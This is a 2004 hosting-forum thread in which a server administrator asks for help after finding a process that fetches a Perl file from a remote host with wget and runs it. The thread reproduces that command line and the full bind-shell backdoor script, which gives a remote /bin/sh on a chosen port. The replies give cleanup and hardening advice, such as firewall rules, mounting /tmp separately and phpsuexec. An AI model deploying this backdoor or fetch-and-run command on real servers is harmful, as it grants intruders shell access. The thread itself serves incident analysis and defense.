hacked ???? www.uhagr.org

**bidouilleur** · 04-18-2004 08:48 AM

while looking over some thing on a server I came across this line....

nobody 32749 0.0 0.0 2100 972 ? S Apr17 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001

I go to that URl and found :

#!/usr/bin/perl

##############################################
# Simple backdoor by UHAGr coded by ghostian #
# usage: ./UHAGr-bd.pl <port> (default 75000)#
# On shell ls = ls; etc. #
# www.uhagr.org #
##############################################

use IO::Socket;

$msg = "echo ::[UHAGr] Yeah! ::-";
$port = ($ARGV[0]);
$shell = "/bin/sh";

if (!$port) { $port="75000"; }

$local = IO::Socket::INET->new(Proto=>"tcp", LocalPort=>"$port",
Listen=>"1") or die "Port allready in use \n";

print "
##############################################
# Simple backdoor by UHAGr coded by ghostian #
# usage: ./UHAGr-bd.pl <port> (default 75000)#
# On shell ls = ls; etc. #
# www.uhagr.org #
##############################################
";

while (accept(remote, $local)) {

open(STDIN, ">&remote");
open(STDOUT, ">&remote");
open(STDERR, ">kick");

system($msg);
system($shell);

close(STDERR);
close(STDIN);
close(STDOUT);
system("rm kick");

}

at http://www.uhagr.org/ I find some tools to exploit servers etc...

I do think we have some kinda backdoor open on this server, I'm no expert at all, so reason I come and ask here what it does, what sys admin could do to close this and where to find the file or how to find it....
my feeling, it is used to open relay to spam, personal opinion....
or am I completely wrong ???

thanks a lot for your help in this matter

**noc32** · 04-19-2004 04:11 AM

This will get that perl script and will launch it. That will provide the hacker with a shell on port 2001 as seems from the command launched.

**laura** · 04-21-2004 03:17 AM

Originally posted by noc32
This will get that perl script and will launch it. That will provide the hacker with a shell on port 2001 as seems from the command launched.

Hi Noc32
How you clean your server after that?

**noc32** · 04-22-2004 05:56 AM

how do you clean the server? good question indeed... because what it was presented here is just a backdoor to the system and god knows what that hacker brought to the system. The system will have to be scanned for:
- rookits
- other backdoors
- for modified binaries (like ps, ls... )

If you're not used to this it's advised to hire a professional to do this or you could always make a full backup and do an OS restore.

**bidouilleur** · 04-22-2004 06:26 AM

we ran a rootkit and it showed nothing really special

we have a firewall and except the standard port needed to run normal services all is closed, we monitor the iptables log and nope, no trace of any traffic nor intrucion ( better break out try)

I killed the services that lead me to this and they didn't re start even after a reboot.....

reason we have it hard to trace it. We keep a close watch on the server.... hope we can trace it one day.....

no unusual traffic....

**eth00** · 04-22-2004 06:59 AM

I played around with that for awhile and it seems like the way it was started and all it was just a temporary shell. Now though that he might have been able to hack your server but it looks like you stayed safe. Once loaded he would have tried to acess it but your firewall blocked port 2001 which is what saved you I think.

Still keep a close eye on it, but looks like you should be fine.

**damainman** · 04-22-2004 04:50 PM

where did u find that line?

Is there anyway to report that user to yahoo??

**eth00** · 04-22-2004 04:58 PM

The line was in ps -aux, or atleast it could be seen there. All isps have an abuse department, just look on their main website or do a whois on the domain.

**bidouilleur** · 04-22-2004 04:58 PM

have a little file ona small account that i can call via the browser with

print "Content-type: text/html\n\n";
print "<html><h1>System Report</h1></html>\n";
print "<br>\n<br>\n<br>\n";
print "System UPTIME response : ";
print `uptime`;
print "\n<br>System UNAME response : ";
print `uname -a`;
print "\n<br>System WHO response : ";
print `who`;
print "\n<br>System ps -auwx response : <pre>\n";
print `ps -auwx`;
print "\n</pre>";

it gives you general info on the server and you see a lot in there

this is how I saw these lines

nobody 4442 0.0 0.0 5052 476 ? S 19:24 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001
nobody 4444 0.0 0.1 6824 1324 ? S 19:24 0:00 perl bd.txt 2001

and it came back, trying to dig again, found 3 bd.txt in /tmp this time, didn't kill anything yet since the ports are closed but am trying to find out now where they come from, there must be something creatint these files, in the file you see the script from post one that you also can see on the site

wondering if there is something else i should delete or not.......

**noc32** · 04-22-2004 10:14 PM

You should look into rc.local or rc.sysinit for this line:

sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001

maybe that's where it's launched. Or it maybe be a cronjob.

**woolly** · 04-24-2004 09:50 PM

you should really secure your tmp directory.

put /tmp and /var/tmp into a seperate partition and then make it non-executable.

**r00t316** · 04-28-2004 03:37 AM

just because /tmp or /var/tmp is not executable doesn't mean you can not execute perl scripts or the like

perl /tmp/bleh.pl

will still work.
Why?
Because perl is actually doing the executing and it is only parsing /tmp/bleh.pl

At any rate.
You need to install phpsuexec and suexec.

Someone did php injection on 1 of your customers sites.
Now because you do not have phpsuexec installed you can not tell who actually has the vulnerable software.
And you now probably have someone logging into your server as nobody which is really bad.
If you run phpsuexec if they do get a backdoor they are only going to be the user of that site.
then you can look at the files in /tmp and see the user.
Look for his domain and then check /usr/local/apache/domlogs
Then look through their domain log file and you can see what was actually called and how they did it.
I also recommend running iptables.
Block everything inbound and only allow certain ports .
80 21,22, 53 , 443, 2086 etc etc
then that backdoor won't work because you did not specify in the iptable rule that port 2001 is allowed inbound traffic.

You should really mount /tmp is a seperate partition however.
It turns away some people not being able to execute from it.
Most people use perl now to use backdoors because everyone has perl installed.

Also you should check /dev/shm <-- new tmp for glibc2
you can umount that it isn't needed.
umount /dev/shm and you probably want to add that to a startup file so it un mounts it at every boot.

before you do that ls -la /dev/shm
make sure noone already put files in it to hack you.

Once you get /tmp mounted as a seperate partition
stop mysql
rm -rf /var/tmp
ln -s /tmp /var/tmp
then you actually kill 2 /var/tmp from being executable.

Hope this helps :P

**bmcpanel** · 02-07-2005 09:54 PM

Originally Posted by r00t316

You should really mount /tmp is a seperate partition however.
It turns away some people not being able to execute from it.

You are right. Securing /tmp is not fool-proof, but it will deter some would be hackers that would otherwise hack your box.

LinkBack

Thread Tools

hacked ???? www.uhagr.org

Plugin using senderscore.org or senderbase.org

www.hostplus.org web hosting y servidores dedicados

Anyone tried http://www.phpclamavlib.org/

automated account creation script located at www.nixt.org